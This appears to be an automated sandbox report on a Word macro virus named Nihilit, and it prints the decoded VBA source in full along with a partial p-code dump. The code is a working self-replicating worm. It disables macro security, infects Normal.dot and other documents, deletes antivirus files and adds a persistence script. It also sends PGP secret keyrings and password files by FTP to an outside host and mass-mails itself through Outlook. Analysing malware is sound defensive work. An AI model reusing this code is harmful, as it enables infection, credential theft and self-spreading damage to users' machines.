Verdict: MALICIOUS
Risk Score: 626

Malware Insights

MITRE ATT&CK: T1059.005 (Visual Basic), T1105 (Ingress Tool Transfer)
The sample contains malicious VBA macros, including AutoOpen and AutoClose functions, which are designed to execute automatically. The script utilizes WScript.Shell to construct and execute a command that archives a document named 'nihilit.doc' into 'Nihilit.zip' within the Windows directory. This indicates an attempt to download and exfiltrate or prepare a second-stage payload.
Heuristics (15)

- ClamAV: Win.Trojan.Kallisti-1 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Kallisti-1
- VBA macros detected [medium, 10 related findings] (OLE_VBA_MACROS): Document contains VBA macro code
- Potential Shell call in VBA [critical] (OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `VBA.Shell z & " -a -r " & w & "\Nihilit.zip" _`
- WScript.Shell usage [critical] (OLE_VBA_WSCRIPT): WScript.Shell usage. Matched line in script: `Print #1, "Set WSHShell = WScript.CreateObject(""WScript.Shell"")"`
- Obfuscated VBA Shell command with URL [critical] (OLE_VBA_OBFUSCATED_SHELL_URL): VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own. Matched line in script: `VBA.Shell z & " -a -r " & w & "\Nihilit.zip" _`
- VBA macro-virus self-replication / AV tampering [critical] (OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script: `Application.VBE.ActiveVBProject.VBComponents("nihilit").CodeModule.InsertLines PoLi, vbTab & "Rem " & A & vbTab & b & vbTab & c & vbTab & d & vbTab & e`
- VBA email-worm self-replication (Outlook mass-mailer) [critical] (OLE_VBA_EMAIL_WORM_SELF_REPLICATION): VBA macro drives Outlook to mass-mail itself: it automates Outlook.Application, programmatically creates a mail item, and spreads by harvesting recipients from the MAPI address book / inbox, attaching a file to the outgoing message, and sending the message programmatically. Harvesting recipients from the address book / inbox and auto-attaching the carrier to outgoing messages is the defining behavior of the Melissa / LoveLetter / W97M mass-mailer worm lineage; there is no benign document use, independent of any AV signature. Matched line in script: `Set Ni_msg = Ni_OApp.CreateItem(0)`
- CreateObject call [high] (OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `Print #1, "Set WSHShell = WScript.CreateObject(""WScript.Shell"")"`
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro [low] (OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub AutoOpen()`
- Auto_Close macro [low] (OLE_VBA_AUTOCLOSE): Auto_Close macro. Matched line in script: `Sub AutoClose()`
- Environ() call (env variable access) [low] (OLE_VBA_ENVIRON): Environ() call (env variable access). Matched line in script: `w = Environ("windir")`
- Reference to Windows Script Host [high] (SC_STR_WSCRIPT): Reference to Windows Script Host
- Legacy WordBasic macro-virus markers [high] (OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://members.tripod.com/Nihilit/ (referenced by macro)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | Detection |
|---|---|---|---|---|
| macros.bas (SHA-256: 3e0b78525351e648b60febc8452c37c76f979ef2e33486fce954785546d4485b) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45227 bytes | ClamAV: Win.Trojan.wmvg-1; Obfuscation or payload: unlikely |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
If MacroContainer <> "Normal.dot" Then Call Cryptme
End Sub
Sub AutoClose()
On Error Resume Next
Randomize
sv = Int(Rnd * 3) + 1
If sv = 1 Then svt$ = "porno.doc"
If sv = 3 Then svt$ = "readme!.doc"
If sv = 2 Then svt$ = "sex.doc"
Call Nihilit
If MacroContainer <> "Normal.dot" Then Call Cryptme
If Left(ActiveDocument.Name, 8) <> "Document" And ActiveDocument.Saved = False Then ActiveDocument.Save
Call KillAV
z = Application.System.PrivateProfileString("", _
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows" & _
"\CurrentVersion\App Paths\winzip32.exe", "")
w = Environ("windir")
VBA.Shell z & " -a -r " & w & "\Nihilit.zip" _
& Chr(32) & w & "\nihilit.doc", vbHide
End Sub
Sub Nihilit()
On Error Resume Next
'thanks to jackie for some advanced code...
Word.Application.Options.VirusProtection = n
Word.Application.Options.ConfirmConversions = n
Word.Application.Options.SaveNormalPrompt = n
Application.DisplayAlerts = wdAlertsNone
Select Case Application.Version
Case "10.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
CommandBars("Macro").Controls("Security...").Enabled = False
Case "9.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
CommandBars("Macro").Controls("Security...").Enabled = False
End Select
WordBasic.DisableAutoMacros 0
Application.DisplayStatusBar = False
ActiveDocument.ReadOnlyRecommended = False
If GetAttr(ActiveDocument.FullName) = 1 Then
SetAttr ActiveDocument.FullName, 0
ActiveDocument.Reload
End If
Set Nor = NormalTemplate.VBProject.VBComponents
Set Doc = ActiveDocument.VBProject.VBComponents
DropFile = "C:\Windows\Nihilit.sys"
If Nor.Item("Nihilit").Name <> "Nihilit" Then
Doc("Nihilit").Export DropFile
Nor.Import DropFile
End If
If Doc.Item("Nihilit").Name <> "Nihilit" Then
Nor("Nihilit").Export DropFile
Doc.Import DropFile
ActiveDocument.Save
End If
SetAttr ActiveDocument.FullName, 1
Call Pgp
Call polyme
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Nihilit") = "C:\Windows\Backup.vbs"
Open "C:\Windows\Backup.vbs" For Output As #1
Print #1, "rem VBS.Backup for Nihilit Virus by Necronomikon"
Print #1, "On Error Resume Next"
Print #1, "Dim WSHShell"
Print #1, "Set WSHShell = WScript.CreateObject(""WScript.Shell"")"
Print #1, "WSHShell.RegWrite ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\AccessVBOM"", 1, ""REG_DWORD"""
Print #1, "WSHShell.RegWrite ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\Level"", 1, ""REG_DWORD"""
Print #1, "WSHShell.RegWrite ""HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level"", 1, ""REG_DWORD"""
Print #1, "Set Backup = WScript.CreateObject(""Word.Application"")"
Print #1, "Backup.Options.VirusProtection = (Rnd * 0)"
Print #1, "Backup.Options.SaveNormalPrompt = (Rnd * 0)"
Print #1, "Backup.NormalTemplate.VBProject.VBComponents.Remove Backup.NormalTemplate.VBProject.VBComponents(""Nihilit"")"
Print #1, "Backup.NormalTemplate.Save"
Print #1, "Backup.NormalTemplate.VBProject.VBComponents.Import (""C:\Windows\Nihilit.sys"")"
Print #1, "Set Search = Backup.Application.Filesearch"
Print #1, "Search.LookIn = ""C:\"": Search.SearchSubFolders = True: Search.FileName = ""*.doc"": Search.Execute"
Print #1, "For f = 1 To Search.FoundFiles.Count"
Print #1, "Victim = Search.FoundFiles(f)"
Print #1, "Backup.Documents.Open Victim"
Print #1, "Backup.ActiveDocument.VBProject.VBComponents.Remove Backup.ActiveDocument.VBProject.VBComponents("" & VirusName & "")"
Print #1, "Backup.ActiveDocument.VBProject.VBComponents.Import (""C:\Windows\Nihilit.sys"")"
Print #1, "Backup.ActiveDocument.Save"
Print #1, "Backup.ActiveDocument.Close"
Print #1, "Next"
Print #1, "Backup.Application.Quit"
Close #1
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Necronomikon\Nihilit", "Irc") = "True"
Call vIRC
If Day(Now) = Minute(Now) Then Selection.TypeText " You are Infected with Nihilit by Necronomikon/ZeroGravity"
ActiveDocument.SaveAs FileName:="C:\Windows\Nihilit.doc", FileFormat:=wdFormatDocument
Set Ni_OApp = CreateObject("Outlook.Application")
Set Ni_Mapi = Ni_OApp.GetNameSpace("MAPI")
For Each Ni_AddList In Ni_Mapi.AddressLists
Next
If Ni_AddList.AddressEntries.Count <> 0 Then
For Ni_AddListCount = 1 To Ni_AddList.AddressEntries.Count
Next
Set Ni_AddListEntry = Ni_AddList.AddressEntries(Ni_AddListCount)
Set Ni_msg = Ni_OApp.CreateItem(0)
Ni_msg.To = Ni_AddListEntry.Address
Ni_msg.Subject = "Check this!!!"
Ni_msg.Body = "I like this story!!!;o)." + vbCrLf + "Nihilit"
Ni_msg.Attachments.Add Environ("WINDIR") & "\Nihilit.doc"
Ni_msg.DeleteAfterSubmit = True
If Ni_msg.To <> "" Then
Ni_msg.Send
End If
End If
End Sub
Sub Pgp()
On Error Resume Next
'taken from W97M/Caligula Virus by Opic/CodeBreakers
If (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "Nihilit") = False) Then
pgppath = System.PrivateProfileString("", "HKEY_CLASSES_ROOT\PGP Encrypted File\shell\open\command", "")
Position = InStr(1, pgppath, "pgpt")
If Position <> 0 Then
pgppath = Mid(pgppath, 1, Position - 2)
Else
GoTo noPGP
End If
With Application.FileSearch
.FileName = "\Secring.skr"
.LookIn = pgppath
.SearchSubFolders = True
.MatchTextExactly = True
.FileType = msoFileTypeAllFiles
.Execute
PGP_Sec_Key = .FoundFiles(1)
End With
Randomize
For i = 1 To 4
NewSecRingFile = NewSecRingFile + Mid(Str(Int(8 * Rnd)), 2, 1)
Next i
NewSecRingFile = "./secring" & NewSecRingFile & ".skr"
Open "c:\sys.vxd" For Output As #1
Print #1, "ftp http://members.tripod.com/Nihilit/"
Print #1, "user nihilit"
Print #1, "pass killer"
Print #1, "cd incoming"
Print #1, "binary"
Print #1, "put """ & PGP_Sec_Key & """ """ & NewSecRingFile & """"
Print #1, "quit"
Close #1
Shell "command.com /c ftp.exe -n -s:c:\sys.vxd", vbHide
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "Nihilit") = True
End If
noPGP:
MsgBox "No PGP found on ya system!?", 64, "Eeeekkkk...."
Call Pwdstealer
End Sub
Sub Pwdstealer()
On Error Resume Next
With Application.FileSearch
.FileName = "*.pwl"
.LookIn = "c:"
.Execute
For i = 1 To .FoundFiles.Count
Shell "ftp http://members.tripod.com/Nihilit/", vbHide
Shell "nihilit", vbHide
Shell "killer", vbHide
Shell "post" & .FoundFiles(i), vbHide
Shell "bye", vbHide
Next i
End With
End Sub
'---- from NTVCK by me!;p -----
Sub KillAV()
On Error Resume Next
Kill "C:\Progra~1\AntiViral Toolkit Pro\*.*"
Kill "C:\Progra~1\Command Software\F-PROT95\*.*"
Kill "C:\Progra~1\FindVirus\*.*"
Kill "C:\Toolkit\FindVirus\*.*"
Kill "C:\Progra~1\Quick Heal\*.*"
Kill "C:\Progra~1\McAfee\VirusScan95\*.*"
Kill "C:\Progra~1\Norton AntiVirus\*.*"
Kill "C:\TBAVW95\*.*"
Kill "C:\VS95\*.*"
Kill "C:\eSafe\Protect\*.*"
Kill "C:\PC-Cillin 95\*.*"
Kill "C:\PC-Cillin 97\*.*"
Kill "C:\f-macro\*.*"
Kill "C:\Progra~1\FWIN32"
End Sub
Sub polyme()
On Error Resume Next
'Ultras Macro Polymorph
PoNu = Int(Rnd() * 28 + 1)
For Mutate = 1 To PoNu
PoRL = Application.VBE.ActiveVBProject.VBComponents("nihilit").CodeModule.CountOfLines
PoLi = Int(Rnd() * PoRL + 1)
A = Rnd * 455: b = Rnd * 80: c = Rnd * 160: d = Rnd * 180: e = Rnd * 49
Application.VBE.ActiveVBProject.VBComponents("nihilit").CodeModule.InsertLines PoLi, vbTab & "Rem " & A & vbTab & b & vbTab & c & vbTab & d & vbTab & e
Next Mutate
End Sub
Sub Cryptme()
On Error GoTo out
Selection.WholeStory
A$ = Selection
For a_ = 1 To Len(A$) Step 2
b$ = b$ + Mid(A$, a_ + 1, 1)
b$ = b$ + Mid(A$, a_, 1)
Next
Selection.TypeText Text:=b$
Selection.Range.Delete
Selection.HomeKey Unit:=wdStory, Extend:=wdMove
out:
End Sub
Sub vIRC()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Necronomikon\Nihilit", "Irc") <> "True" Then
End If
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\MeGALiTH Software\Visual IRC96\Events", "Event17") = "dcc send $nick C:\Windows\Nihilit.zip"
End Sub
Sub ToolsOptions()
On Error Resume Next
Options.VirusProtection = 1
Options.SaveNormalPrompt = 1
Dialogs(wdDialogToolsOptions).Show
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
End Sub
Sub ToolsSecurity()
On Error Resume Next
CommandBars("Macro").Controls("Security...").Enabled = True
Dialogs(wdDialogToolsSecurity).Show
CommandBars("Macro").Controls("Security...").Enabled = False
Call polyme
End Sub
Sub FileTemplates()
On Error Resume Next
Call polyme
End Sub
Sub ToolsMacro()
On Error Resume Next
Call Stealth
Dialogs(wdDialogToolsMacro).Display
Call polyme
End Sub
Sub ViewVBCode()
On Error Resume Next
Call Stealth
ShowVisualBasicEditor = True
Call polyme
End Sub
Sub Stealth()
On Error Resume Next
Application.OrganizerDelete Source:=NormalTemplate.Name, _
Name:="Nihilit", Object:=wdOrganizerObjectProjectItems
Application.OrganizerDelete Source:=ActiveDocument.Name, _
Name:="Nihilit", Object:=wdOrganizerObjectProjectItems
NormalTemplate.Saved = True
ActiveDocument.Saved = True
End Sub
Sub HelpAbout()
On Error Resume Next
WordBasic.FileNew
WordBasic.ToggleFull
WordBasic.DocMaximize
WordBasic.Font "Comic Sans MS"
WordBasic.FontSize 60
WordBasic.Bold
WordBasic.Insert "Check this!"
WordBasic.StartOfLine
WordBasic.CharRight 1, 1
WordBasic.FormatFont Points:="48", Color:=6
WordBasic.EndOfLine
WordBasic.InsertPara
WordBasic.InsertPara
WordBasic.FontSize 48
WordBasic.Insert "Nihilit was coded by Necronomikon."
End Sub
Sub FileExit()
On Error Resume Next
Call Nihilit
If ActiveDocument.Saved = False Then ActiveDocument.Save
Application.WindowState = wdWindowStateMinimize
pName = CurDir & "\"
fName = Dir(pName & "*.doc", sAttr)
If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call Nihilit
Do While (fName <> "")
fName = Dir()
If (fName <> "") And _
((fName <> ".") And (fName <> "..")) Then
InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call Nihilit
End If
Loop
ChangeFileOpenDirectory "p:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "h:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "f:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
Application.Quit
End Sub
Sub AutoExit()
On Error Resume Next
Call Nihilit
Application.WindowState = wdWindowStateMinimize
pName = CurDir & "\"
fName = Dir(pName & "*.doc", sAttr)
If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call Nihilit
Do While (fName <> "")
fName = Dir()
If (fName <> "") And _
((fName <> ".") And (fName <> "..")) Then
InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call Nihilit
End If
Loop
If ActiveDocument.Saved = False Then ActiveDocument.Save
ChangeFileOpenDirectory "p:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "r:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "s:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
End Sub
' Processing file: /tmp/qstore_69plt3wc
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 21784 bytes
' Line #0:
' Line #1:
' FuncDefn (Sub AutoOpen())
' Line #2:
' Ld MacroContainer
' LitStr 0x000A "Normal.dot"
' Ne
' If
' BoSImplicit
' ArgsCall (Call) Cryptme 0x0000
' EndIf
' Line #3:
' EndSub
' Line #4:
' Line #5:
' FuncDefn (Sub AutoClose())
' Line #6:
' OnError (Resume Next)
' Line #7:
' ArgsCall Randomize 0x0000
' Line #8:
' Ld Rnd
' LitDI2 0x0003
' Mul
' FnInt
' LitDI2 0x0001
' Add
' St sv
' Line #9:
' Ld sv
' LitDI2 0x0001
' Eq
' If
' BoSImplicit
' LitStr 0x0009 "porno.doc"
' St svt$
' EndIf
' Line #10:
' Ld sv
' LitDI2 0x0003
' Eq
' If
' BoSImplicit
' LitStr 0x000B "readme!.doc"
' St svt$
' EndIf
' Line #11:
' Ld sv
' LitDI2 0x0002
' Eq
' If
' BoSImplicit
' LitStr 0x0007 "sex.doc"
' St svt$
' EndIf
' Line #12:
' ArgsCall (Call) Nihilit 0x0000
' Line #13:
' Line #14:
' Ld MacroContainer
' LitStr 0x000A "Normal.dot"
' Ne
' If
' BoSImplicit
' ArgsCall (Call) Cryptme 0x0000
' EndIf
' Line #15:
' Ld ActiveDocument
' MemLd Name
' LitDI2 0x0008
' ArgsLd Left 0x0002
' LitStr 0x0008 "Document"
' Ne
' Ld ActiveDocument
' MemLd Saved
' LitVarSpecial (False)
' Eq
' And
' If
' BoSImplicit
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' EndIf
' Line #16:
' ArgsCall (Call) KillAV 0x0000
' Line #17:
' Line #18:
' LineCont 0x0008 0A 00 00 00 0C 00 00 00
' LitStr 0x0000 ""
' LitStr 0x002D "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows"
' LitStr 0x0026 "\CurrentVersion\App Paths\winzip32.exe"
' Concat
' LitStr 0x0000 ""
' Ld Application
' MemLd System
' ArgsMemLd PrivateProfileString 0x0003
' St z
' Line #19:
' LitStr 0x0006 "windir"
' ArgsLd Environ 0x0001
' St w
' Line #20:
' LineCont 0x0004 0A 00 00 00
' Ld z
' LitStr 0x0007 " -a -r "
' Concat
' Ld w
' Concat
' LitStr 0x000C "\Nihilit.zip"
' Concat
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' Concat
' Ld w
' Concat
' LitStr 0x000C "\nihilit.doc"
' Concat
' Ld vbHide
' Ld VBA
' ArgsMemCall Shell 0x0002
' Line #21:
' EndSub
' Line #22:
' Line #23:
' FuncDefn (Sub Nihilit())
' Line #24:
' OnError (Resume Next)
' Line #25:
' QuoteRem 0x0000 0x002A "thanks to jackie for some advanced code..."
' Line #26:
' Ld n
' Ld Word
' MemLd Application
' MemLd Options
' MemSt VirusProtection
' Line #27:
' Ld n
' Ld Word
' MemLd Application
' MemLd Options
' MemSt ConfirmConversions
' Line #28:
' Ld n
' Ld Word
' MemLd Application
' MemLd Options
' MemSt SaveNormalPrompt
' Line #29:
' Ld wdAlertsNone
' Ld Application
' MemSt DisplayAlerts
' Line #30:
' Line #31:
' Ld Application
' MemLd Version
' SelectCase
' Line #32:
' LitStr 0x0004 "10.0"
' Case
' CaseDone
' Line #33:
' LitDI4 0x0001 0x0000
' LitStr 0x0000 ""
' LitStr 0x003E "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"
' LitStr 0x0005 "Level"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #34:
' LitDI4 0x0001 0x0000
' LitStr 0x0000 ""
' LitStr 0x003E "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"
' LitStr 0x000A "AccessVBOM"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #35:
' LitVarSpecial (False)
' LitStr 0x000B "Security..."
' LitStr 0x0005 "Macro"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' MemSt Enabled
' Line #36:
' LitStr 0x0003 "9.0"
' Case
' CaseDone
' Line #37:
' LitDI4 0x0001 0x0000
' LitStr 0x0000 ""
' LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' LitStr 0x0005 "Level"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #38:
' LitVarSpecial (False)
' LitStr 0x000B "Security..."
' LitStr 0x0005 "Macro"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' MemSt Enabled
' Line #39:
' EndSelect
' Line #40:
' LitDI2 0x0000
' Ld WordBasic
' ArgsMemCall DisableAutoMacros 0x0001
' Line #41:
' LitVarSpecial (False)
' Ld Application
' MemSt DisplayStatusBar
' Line #42:
' LitVarSpecial (False)
' Ld ActiveDocument
' MemSt ReadOnlyRecommended
' Line #43:
' Ld ActiveDocument
' MemLd FullName
' ArgsLd GetAttr 0x0001
' LitDI2 0x0001
' Eq
' IfBlock
' Line #44:
' Ld ActiveDocument
' MemLd FullName
' LitDI2 0x0000
' ArgsCall SetAttr 0x0002
' Line #45:
' Ld ActiveDocument
' ArgsMemCall Reload 0x0000
' Line #46:
' EndIfBlock
' Line #47:
' SetStmt
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' Set Nor
' Line #48:
' SetStmt
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' Set Doc
' Line #49:
' LitStr 0x0016 "C:\Windows\Nihilit.sys"
' St DropFile
' Line #50:
' LitStr 0x0007 "Nihilit"
' Ld Nor
' ArgsMemLd Item 0x0001
' MemLd Name
' LitStr 0x0007 "Nihilit"
' Ne
' IfBlock
' Line #51:
' Ld DropFile
' LitStr 0x0007 "Nihilit"
' ArgsLd Doc 0x0001
' ArgsMemCall Export 0x0001
' Line #52:
' Ld DropFile
' Ld Nor
' ArgsMemCall Import 0x0001
' Line #53:
' EndIfBlock
' Line #54:
' LitStr 0x0007 "Nihilit"
' Ld Doc
' ArgsMemLd Item 0x0001
' MemLd Name
' LitStr 0x0007 "Nihilit"
' Ne
' IfBlock
' Line #55:
' Ld DropFile
' LitStr 0x0007 "Nihilit"
' ArgsLd Nor 0x0001
' ArgsMemCall Export 0x0001
' Line #56:
' Ld DropFile
' Ld Doc
' ArgsMemCall Import 0x0001
' Line #57:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #58:
' EndIfBlock
' Line #59:
' Ld ActiveDocument
' MemLd FullName
' LitDI2 0x0001
' ArgsCall SetAttr 0x0002
' Line #60:
' ArgsCall (Call) Pgp 0x0000
' Line #61:
' ArgsCall (Call) polyme 0x0000
' Line #62:
' LitStr 0x0015 "C:\Windows\Backup.vbs"
' LitStr 0x0000 ""
' LitStr 0x0040 "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
' LitStr 0x0007 "Nihilit"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #63:
' LitStr 0x0015 "C:\Windows\Backup.vbs"
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Output)
' Line #64:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0030 "rem VBS.Backup for Nihilit Virus by Necronomikon"
' PrintItemNL
' Line #65:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0014 "On Error Resume Next"
' PrintItemNL
' Line #66:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000C "Dim WSHShell"
' PrintItemNL
' Line #67:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0034 "Set WSHShell = WScript.CreateObject("WScript.Shell")"
' PrintItemNL
' Line #68:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x006D "WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\AccessVBOM", 1, "REG_DWORD""
' PrintItemNL
' Line #69:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0068 "WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\Level", 1, "REG_DWORD""
' PrintItemNL
' Line #70:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0067 "WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD""
' PrintItemNL
' Line #71:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0035 "Set Backup = WScript.CreateObject("Word.Application")"
' PrintItemNL
' Line #72:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x002A "Backup.Options.VirusProtection = (Rnd * 0)"
' PrintItemNL
' Line #73:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x002B "Backup.Options.SaveNormalPrompt = (Rnd * 0)"
' PrintItemNL
' Line #74:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x006B "Backup.NormalTemplate.VBProject.VBComponents.Remove Backup.NormalTemplate.VBProject.VBComponents("Nihilit")"
' PrintItemNL
' Line #75:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001A "Backup.NormalTemplate.Save"
' PrintItemNL
' Line #76:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x004E "Backup.NormalTemplate.VBProject.VBComponents.Import ("C:\Windows\Nihilit.sys")"
' PrintItemNL
' Line #77:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x002A "Set Search = Backup.Application.Filesearch"
' PrintItemNL
' Line #78:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0060 "Search.LookIn = "C:\": Search.SearchSubFolders = True: Search.FileName = "*.doc": Search.Execute"
' PrintItemNL
' Line #79:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0024 "For f = 1 To Search.FoundFiles.Count"
' PrintItemNL
' Line #80:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001D "Victim = Search.FoundFiles(f)"
' PrintItemNL
' Line #81:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001C "Backup.Documents.Open Victim"
' PrintItemNL
' Line #82:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0073 "Backup.ActiveDocument.VBProject.VBComponents.Remove Backup.ActiveDocument.VBProject.VBComponents(" & VirusName & ")"
' PrintItemNL
' Line #83:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x004E "Backup.ActiveDocument.VBProject.VBComponents.Import ("C:\Windows\Nihilit.sys")"
' PrintItemNL
' Line #84:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001A "Backup.ActiveDocument.Save"
' PrintItemNL
' Line #85:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001B "Backup.ActiveDocument.Close"
' PrintItemNL
' Line #86:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0004 "Next"
' PrintItemNL
' Line #87:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0017 "Backup.Application.Quit"
' PrintItemNL
' Line #88:
' LitDI2 0x0001
' Sharp
' Close 0x0001
' Line #89:
' LitStr 0x0004 "True"
' LitStr 0x0000 ""
' LitStr 0x0030 "HKEY_LOCAL_MACHINE\Software\Necronomikon\Nihilit"
' LitStr 0x0003 "Irc"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #90:
' ArgsCall (Call) vIRC 0x0000
' Line #91:
' Ld Now
' ArgsLd Day 0x0001
' Ld Now
' ArgsLd Minute 0x0001
' Eq
' If
' BoSImplicit
' LitStr 0x003A " You are Infected with Nihilit by Necronomikon/ZeroGravity"
' Ld Selection
